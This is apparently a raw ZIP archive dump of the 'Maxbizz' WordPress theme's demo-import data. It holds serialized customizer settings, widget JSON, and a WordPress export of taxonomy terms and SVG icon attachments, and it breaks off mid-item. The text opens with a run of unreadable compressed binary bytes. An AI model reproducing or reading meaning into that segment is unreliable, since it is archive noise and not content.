�?���q�r�����?�Q�6?%�����q�r���g���(͛�����q�r�A�Or4�9J�OД�9o�6?%k�����y_����Y�c�J���?�~����J~��+�b�ߗ�z�<v͛����g���(���o�r�ٱ�#�����.?�Q����o�r�ٱ�/���g���(���o�r�ٱ�/���g���(�o�\M?LV�S�=~�[f͏�~io����ṛ�v��?��͛/���g����
�������lد�������o�����s6lW�m�#����޾�����v�s?����Nl�G���k������g���)͛�>m���[�ܣ��?�G��*��~��O����6l~J>(?�����s7����ṛ6_'��'����g����
�ٱ_���g����
�������lد�������o�����o6lW������s7����ṛ6+�w����Ṋ[��=Q��x�{��_���W6lT�c���_O�\��s��_�&͛%�b�9�k���e��]ܗ6l~J�;�k����ӽ�M��?�l�>Iw������3�����3f�-�ӻS��Nߡ|}��������7�6*Կ�x��]�~����m���|_��_�J��f̓�◧OҬ��{���D������Q�6;�������[�ܣ6l
������9������S�6��?��o�r���g���(͛����q�r|��7�k����͊~M���\�ܛ7�����ɳf�~KO��]�ܗO��䙳d~i���{�r<��?�k���͈���U���G�v��I�'�;����_�+��6O�Ĭ���������O��?��_��sf��o����܃7����Ί6*�����Q���A_o�ٱ�+��PK�8FZ(ә%�
�
'inc/backend/data/finance/customizer.datnu�[���a:4:{s:8:"template";s:7:"maxbizz";s:4:"mods";a:19:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:1210;s:10:"main_color";s:7:"#52c5b6";s:9:"body_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:11:"second_font";a:5:{s:11:"font-family";s:0:"";s:11:"font-backup";s:0:"";s:7:"variant";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:13:"heading1_typo";a:9:{s:11:"font-family";s:5:"Prata";s:7:"variant";s:7:"regular";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:400;s:10:"font-style";s:6:"normal";}s:13:"heading2_typo";a:9:{s:11:"font-family";s:5:"Prata";s:7:"variant";s:7:"regular";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:400;s:10:"font-style";s:6:"normal";}s:13:"heading3_typo";a:9:{s:11:"font-family";s:5:"Prata";s:7:"variant";s:7:"regular";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:400;s:10:"font-style";s:6:"normal";}s:13:"heading4_typo";a:9:{s:11:"font-family";s:5:"Prata";s:7:"variant";s:7:"regular";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:400;s:10:"font-style";s:6:"normal";}s:13:"heading5_typo";a:9:{s:11:"font-family";s:5:"Prata";s:7:"variant";s:7:"regular";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:400;s:10:"font-style";s:6:"normal";}s:13:"heading6_typo";a:9:{s:11:"font-family";s:5:"Prata";s:7:"variant";s:7:"regular";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:400;s:10:"font-style";s:6:"normal";}s:13:"header_layout";s:3:"267";s:13:"header_mobile";s:2:"77";s:16:"sidepanel_layout";s:3:"253";s:11:"pheader_img";s:96:"http://wpdemo.archiwp.com/maxbizz-finance/wp-content/uploads/sites/11/2020/09/pheader-blog-1.jpg";s:13:"footer_layout";s:3:"300";s:7:"preload";b:1;s:12:"preload_logo";s:90:"http://wpdemo.archiwp.com/maxbizz-finance/wp-content/uploads/sites/11/2020/12/05_Black.svg";}s:7:"options";a:2:{s:9:"site_icon";s:4:"2465";s:23:"nav_menus_created_posts";a:0:{}}s:6:"wp_css";s:0:"";}PK�8FZ故��$inc/backend/data/finance/widgets.wienu�[���{"primary":{"author_widget-1":{"title":"Tina Moriss","text":"She is the CEO. She's a big fan her cat Tux, & dinner parties","image":"http:\/\/wpdemo.archiwp.com\/maxbizz-corporate\/wp-content\/uploads\/sites\/10\/2020\/11\/author-widget.png","facebook":"#","twitter":"#","google":"","linkedin":"#","pinterest":"","instagram":"#","youtube":"","dribbble":""},"categories-3":{"title":"","count":1,"hierarchical":0,"dropdown":0},"recent_news-1":{"title":"Recent Posts","count":1,"posts_per_page":"3"},"tag_cloud-1":{"title":"Tags","count":0,"taxonomy":"post_tag"},"media_image-1":{"size":"full","width":270,"height":300,"caption":"","alt":"","link_type":"custom","link_url":"","image_classes":"","link_classes":"","link_rel":"","link_target_blank":false,"image_title":"","attachment_id":2416,"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-finance\/wp-content\/uploads\/sites\/11\/2020\/11\/bannner-widget-home5.jpg","title":""}}}PK�8FZ�:���,inc/backend/data/consulting/demo-content.xmlnu�[���<?xml version="1.0" encoding="UTF-8" ?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your site. -->
<!-- It contains information about your site's posts, pages, comments, categories, and other content. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- This file is not intended to serve as a complete backup of your site. -->

<!-- To import this information into a WordPress site follow these steps: -->
<!-- 1. Log in to that site as an administrator. -->
<!-- 2. Go to Tools: Import in the WordPress admin panel. -->
<!-- 3. Install the "WordPress" importer from the list. -->
<!-- 4. Activate & Run Importer. -->
<!-- 5. Upload this file using the form provided on that page. -->
<!-- 6. You will first be asked to map the authors in this export file to users -->
<!--    on the site. For each author, you may choose to map to an -->
<!--    existing user on the site or to create a new user. -->
<!-- 7. WordPress will then import each of the posts, pages, comments, categories, etc. -->
<!--    contained in this file into your site. -->

	<!-- generator="WordPress/5.6" created="2020-12-29 04:49" -->
<rss version="2.0"
	xmlns:excerpt="http://wordpress.org/export/1.2/excerpt/"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:wp="http://wordpress.org/export/1.2/"
>

<channel>
	<title>Maxbizz Consulting</title>
	<link>http://wpdemo.archiwp.com/maxbizz-consulting</link>
	<description>Financial &#38; Consulting Demo WordPress Theme</description>
	<pubDate>Tue, 29 Dec 2020 04:49:38 +0000</pubDate>
	<language>en-US</language>
	<wp:wxr_version>1.2</wp:wxr_version>
	<wp:base_site_url>http://wpdemo.archiwp.com/</wp:base_site_url>
	<wp:base_blog_url>http://wpdemo.archiwp.com/maxbizz-consulting</wp:base_blog_url>

		<wp:author><wp:author_id>1</wp:author_id><wp:author_login><![CDATA[admin]]></wp:author_login><wp:author_email><![CDATA[support@oceanthemes.net]]></wp:author_email><wp:author_display_name><![CDATA[Tom Black]]></wp:author_display_name><wp:author_first_name><![CDATA[Tom]]></wp:author_first_name><wp:author_last_name><![CDATA[Black]]></wp:author_last_name></wp:author>

		<wp:category>
		<wp:term_id>2</wp:term_id>
		<wp:category_nicename><![CDATA[business]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[business]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>3</wp:term_id>
		<wp:category_nicename><![CDATA[consulting]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[consulting]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>4</wp:term_id>
		<wp:category_nicename><![CDATA[finance]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[finance]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>5</wp:term_id>
		<wp:category_nicename><![CDATA[marketing]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[marketing]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>1</wp:term_id>
		<wp:category_nicename><![CDATA[uncategorized]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[Uncategorized]]></wp:cat_name>
	</wp:category>
			<wp:tag>
		<wp:term_id>6</wp:term_id>
		<wp:tag_slug><![CDATA[analysis]]></wp:tag_slug>
		<wp:tag_name><![CDATA[analysis]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>7</wp:term_id>
		<wp:tag_slug><![CDATA[business]]></wp:tag_slug>
		<wp:tag_name><![CDATA[business]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>8</wp:term_id>
		<wp:tag_slug><![CDATA[consulting]]></wp:tag_slug>
		<wp:tag_name><![CDATA[consulting]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>9</wp:term_id>
		<wp:tag_slug><![CDATA[finance]]></wp:tag_slug>
		<wp:tag_name><![CDATA[finance]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>10</wp:term_id>
		<wp:tag_slug><![CDATA[marketing]]></wp:tag_slug>
		<wp:tag_name><![CDATA[marketing]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>11</wp:term_id>
		<wp:tag_slug><![CDATA[news]]></wp:tag_slug>
		<wp:tag_name><![CDATA[news]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>12</wp:term_id>
		<wp:tag_slug><![CDATA[strategy]]></wp:tag_slug>
		<wp:tag_name><![CDATA[strategy]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>13</wp:term_id>
		<wp:tag_slug><![CDATA[tips]]></wp:tag_slug>
		<wp:tag_name><![CDATA[tips]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>14</wp:term_id>
		<wp:tag_slug><![CDATA[trading]]></wp:tag_slug>
		<wp:tag_name><![CDATA[trading]]></wp:tag_name>
	</wp:tag>
			<wp:term>
		<wp:term_id>15</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[business]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[business]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>16</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[finance]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[finance]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>17</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[marketing]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[marketing]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>18</wp:term_id>
		<wp:term_taxonomy><![CDATA[elementor_library_type]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[page]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[page]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>19</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[startup]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[startup]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>20</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[strategy]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[strategy]]></wp:term_name>
	</wp:term>
			<wp:term><wp:term_id>21</wp:term_id><wp:term_taxonomy>nav_menu</wp:term_taxonomy><wp:term_slug><![CDATA[main-menu]]></wp:term_slug><wp:term_name><![CDATA[Main Menu]]></wp:term_name>
</wp:term>

	<generator>https://wordpress.org/?v=5.6</generator>

<image>
	<url>https://maxbizz.s3.amazonaws.com/images/favicon-blue.png</url>
	<title>Maxbizz Consulting</title>
	<link>http://wpdemo.archiwp.com/maxbizz-consulting</link>
	<width>32</width>
	<height>32</height>
</image> 

		<item>
		<title>01_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-1/01_black/</link>
		<pubDate>Thu, 03 Sep 2020 09:10:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>334</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:10:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:10:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>7</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/01_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#1B1D21;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="0" style="stop-color:#FFD797"></stop>
	<stop offset="1" style="stop-color:#FF8523"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>call</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-1/call/</link>
		<pubDate>Thu, 03 Sep 2020 09:13:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/call.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>345</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:13:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:13:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[call]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>7</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/call.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/call.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pin</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-1/pin/</link>
		<pubDate>Thu, 03 Sep 2020 09:14:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pin.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>347</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:14:55]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:14:55]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pin]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>7</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pin.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/pin.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>02_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-2/02_black/</link>
		<pubDate>Thu, 03 Sep 2020 09:24:35 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/02_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>350</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:24:35]]></wp:post_date>
